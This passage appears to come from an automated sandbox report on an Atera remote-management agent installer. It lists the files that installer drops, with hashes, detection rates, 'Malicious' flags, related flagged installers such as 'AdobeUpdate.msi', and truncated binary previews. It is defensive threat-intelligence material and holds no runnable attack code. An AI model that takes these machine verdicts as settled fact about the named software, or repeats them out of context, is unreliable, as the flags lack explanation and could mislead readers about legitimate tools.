                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                  • Filename: ALVARA-072.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: setup_north_west_arctic_borrough.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: 9rSeCZbjZE.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: TRABALHO----PROCESSO0014S55-S440000000S1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: AdobeUpdate.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: Y3Wvl9aYAU.cmd, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1442
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                                                                  MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                                                                  SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                                                                  SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                                                                  SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3318832
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                                                                  MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                                                                  SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                                                                  SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                  • Filename: ALVARA-072.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: setup_north_west_arctic_borrough.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: 9rSeCZbjZE.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: TRABALHO----PROCESSO0014S55-S440000000S1.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: AdobeUpdate.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: Y3Wvl9aYAU.cmd, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215088
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                                                                  MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                                                                  SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                                                                  SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                                                                  MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                                                                  SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1967312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999049879452388
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:2xK5u/Nel2lKkBkfNuj9KXiUYL/L6ER9PH/KN1:Ws0refNk9KXjg6k9K7
                                                                                                                                                                                                                                                                                                                                  MD5:E0B94CE5D948F332B6BCB4661B73611B
                                                                                                                                                                                                                                                                                                                                  SHA1:A9272BD639FF5F25F44B3A31C5CB919F0D40C4D3
                                                                                                                                                                                                                                                                                                                                  SHA-256:A27B758C00EAB6777AC9571EF4FCDB80ABACCBC4EB6FA5FF8E5EC33C08FFBC37
                                                                                                                                                                                                                                                                                                                                  SHA-512:17B5DF8EA6CCBB64839E5D223ED388A3BB54C0A7974E05E285361E36489D63F9E4A5F0DA21CDF86C58DBE80903E8CB288817291DCE4C7E98E8E8CE8A0B912B46
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:PK.........R\Y................Agent.Package.Watchdog/PK.........Q\Y.#.L>.......7...Agent.Package.Watchdog/Agent.Package.Watchdog.deps.json..Z..%..3S..0..S..Z.....>.N........B.GQ..%..<>.BQ./..T...Y.F.....t....F.%:WJ3.....M....v/..c.....jl.M....l.T..L5..Ex..JM1...Z1.s.3..[...744...y9..T..9B._s..(q.yokD&....6m.I...E......VL.T...q..S..A..oV.}H...D.M.b.. ...p....L.d.>0..(..G`.I.<...m.#.P;4...X...:*...z?...I..x;....~5..h...qEg.....n#..K%.....&.\..N........@.O0........s.t...f..Y..... ....K.L.....i..P...K.k.F}...n2Vw...._@...C...D.,.Z..T...*.?k%2..o..7T..S.f....0a........n..92..s.Y...;...6.s........b.*O.`...u;.%}#...A7]X..j..I..D..W...va8....j...{.S..e2T...!.....?..w..4hu.....C...m..n....`...T........%.jr.M..&=#..\h)p"..._.tU|I.f..!..."....f.....bAC.*.*S......?../`...~..#..f4M+X..>>s...sE....2..C"H.....=3-_..|.6/..V..y...8...,..x.gg.3..S......x...4s.. r...A.*.@....l.o)J...1;.j...G....&..h.UX3.d....]x..9.....8..LI...<.>t.r..qg....\..Y-....ldJ..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.deps.json

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):39359
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.001107788783311
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:YT5DUarXaaec21v5Oc55MNXP4RBTEQ88jnfA:YNDUarXaaecC5Oc55mXP4TTEuA
                                                                                                                                                                                                                                                                                                                                  MD5:D4D3077248D2EC265329DA2BB4EB1409
                                                                                                                                                                                                                                                                                                                                  SHA1:C4118CD8CC0C738D212BD57B262C83652BD06582
                                                                                                                                                                                                                                                                                                                                  SHA-256:6E5DCE5A789BB451AF3B5136C9832DA6A621A92EAA151D1BA699B9C0FB6CFB9E
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC479A172E4F0E90A096B13D5F785EC3184F214000B9578D835E9A4FBF7BA64F3C2D0F679C6B0F325B9A34623E8548CBD4B8C1873A4DF1CAFECC94AAD343F7BD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Watchdog/1.7": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.4",.. "Atera.Agent.Package.Tools": "1.0.22",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.4": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "7.0.1",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "7.2.3",.. "Serilog.Extensions.Hosting": "5.0.1",.. "Serilog.Sinks.File": "5.0.0".. },.. "runtime": {.. "lib/net6.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.4.0",.. "fileVe

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.47147075844103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:I0uXcA8f/rEacom1OiYW32L0k8pJsjmd+uE8aNmHCiYVGx5mNyb8E9VF6IYijSJn:IDXcA8HBcomwxW3Rk3C+udBuEpYi60q
                                                                                                                                                                                                                                                                                                                                  MD5:BF7FBE22354E89B5DF6F582973F5B22B
                                                                                                                                                                                                                                                                                                                                  SHA1:72EC8C0FC38C56B3C54470D2E06F12A1E953E380
                                                                                                                                                                                                                                                                                                                                  SHA-256:5EB9E33C135DC0D15CF5F76DBA79F708853B90D95E4AD4442A9F0FEE1463B670
                                                                                                                                                                                                                                                                                                                                  SHA-512:7C3EC0AB5060F94112BB80D399041913066619E75786AC6549733478FEDA8D8318D3470798EC4E16F54D7D04C9E1962D66DEB33855F18A42C45BC0A396EC7AD5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..X...........w... ........@.. ....................................`.................................4w..O....................b..P(...........w............................................... ............... ..H............text....W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B................hw......H........2..<D............................................................{....*..{....*..{....*..{....*..{....*..{....*..(......}......}......}.......}.......}.......}....*....0...........u.......;.....9....(.....{.....{....o....,w(.....{.....{....o....,_( ....{.....{....o!...,G("....{.....{....o#...,/($....{.....{....o%...,.(&....{.....{....o'...*.*.*..0.......... ...9 )UU.Z(.....{....o(...X )UU.Z(.....{....o)...X )UU.Z( ....{....o*...X )UU.Z("....{....o+...X )UU.Z($....{..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):161360
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.243709345342072
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:T5vnr5Tbx829UOeKnn2LFzZBp13u36wKp4CULCXodwq:TBKjK2LFzZNfJULqA
                                                                                                                                                                                                                                                                                                                                  MD5:57130702F8EA46ED0437EA893C95F7E4
                                                                                                                                                                                                                                                                                                                                  SHA1:0E26C3EF0EC0BE063AACD7321EE550E321BAD17F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9338C8080CB7BE1EE73F1CD706E5E230A0C3B8690305CD9DE451FAD20B2D0B7B
                                                                                                                                                                                                                                                                                                                                  SHA-512:10951C367AC35DBA9D644FB1CC07043FC238F4CAD5AB2280CC1102E860676E1BC4B3A88054F252E26AA9B9E2B52C8941C2D47E1E79D153B4EE3780151C73A02C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.J.^.J.^.J.+.K.^.J.+.K.^.J.+.K.^.J.&GJ.^.J^,.K.^.J.^.J@^.JG+.K.^.JG+.K.^.JRich.^.J........................PE..d......f..........".................P@.........@..........................................`.................................................|(...............`..L....N..P(.......... ...T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data...X....@......."..............@....pdata..L....`.......,..............@..@_RDATA...............B..............@..@.reloc...............D..............@..B.rsrc................H..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUmov:Wvov
                                                                                                                                                                                                                                                                                                                                  MD5:82F71B382E51CAE212E670779DBDF14E
                                                                                                                                                                                                                                                                                                                                  SHA1:C764F353E7B76236468649989C39EAEF3B97E701
                                                                                                                                                                                                                                                                                                                                  SHA-256:B57642302DEA3460BD78B6D9C62593939852C8526BA1779067D411E4DDA3DE17
                                                                                                                                                                                                                                                                                                                                  SHA-512:C5687A7DBBD4C714181F1ECFE1810A48109A4D9D4E3E90E88DA67FA3CB2736D5B3AA260B6680FA6A07FAA66CCB59DB05F9E8E345FD0DC50ABB63CB83DAAF0BFF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:version=1.7..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.runtimeconfig.json

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622820819612829
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:3Hp/hdNyhAkv3Opo/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkv3OpJ5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                                                                                                                  MD5:AA6C95679FBDCCE9930CD0588089344B
                                                                                                                                                                                                                                                                                                                                  SHA1:46294C035BFB927915DC089C67475610AF904E86
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DA9CA03D76A3AA7BAB068EC578B441B3DC3BA7F9C94EE42203286B8E650F5B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:91EC4C51D846AA4D881F02FFE051B4A6BDD7263574214186D7D8609AD4447E38D5547586C3B973FD6371622A6F574B767405074ABC96CFF40B7B3D7C8A9F7842
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "rollForward": "LatestMajor",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53840
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.298479197446433
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:wdUSqld/oh93y+UR4ULL4L88EKNoo9sXQqthEpYi60QcL:wd2P/phL4L8KGo9sgqtK76i
                                                                                                                                                                                                                                                                                                                                  MD5:80191EE3D5222E24FDD9BC881060AFF5
                                                                                                                                                                                                                                                                                                                                  SHA1:F160954F0C85D46898FBE0389CD73248DEB3AE2F
                                                                                                                                                                                                                                                                                                                                  SHA-256:21841818D392592064E6E0F804B8FD335BC489CCF9F70C28365077F1340B6A6A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FBB489261990DBD14D7C224526F8FDBEA8984DD52670C8D4EBA11B08F7A2C68BB02BBC1FDEFFE81CFCEBE41474DE2CC0F4EDEF9F1A95E88B1C6A9A5547820FB0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.(..........." ..0.................. ........... ...............................-....`.................................X...O.......t...............P(..........P...T............................................ ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc..............................@..B........................H........I...t............................................................{....*..{....*..{....*r.(......}......}......}....*....0..Y........u........L.,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*.*....0..K....... M.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o ...X*..0...........r...p......%..{.......%q.........-.&.+.......o!....%..{.......%q.........-.&.+.......o!....%..{.......%q.........-.&.+.......o!....("...*..(#...*^.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273406477094498
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
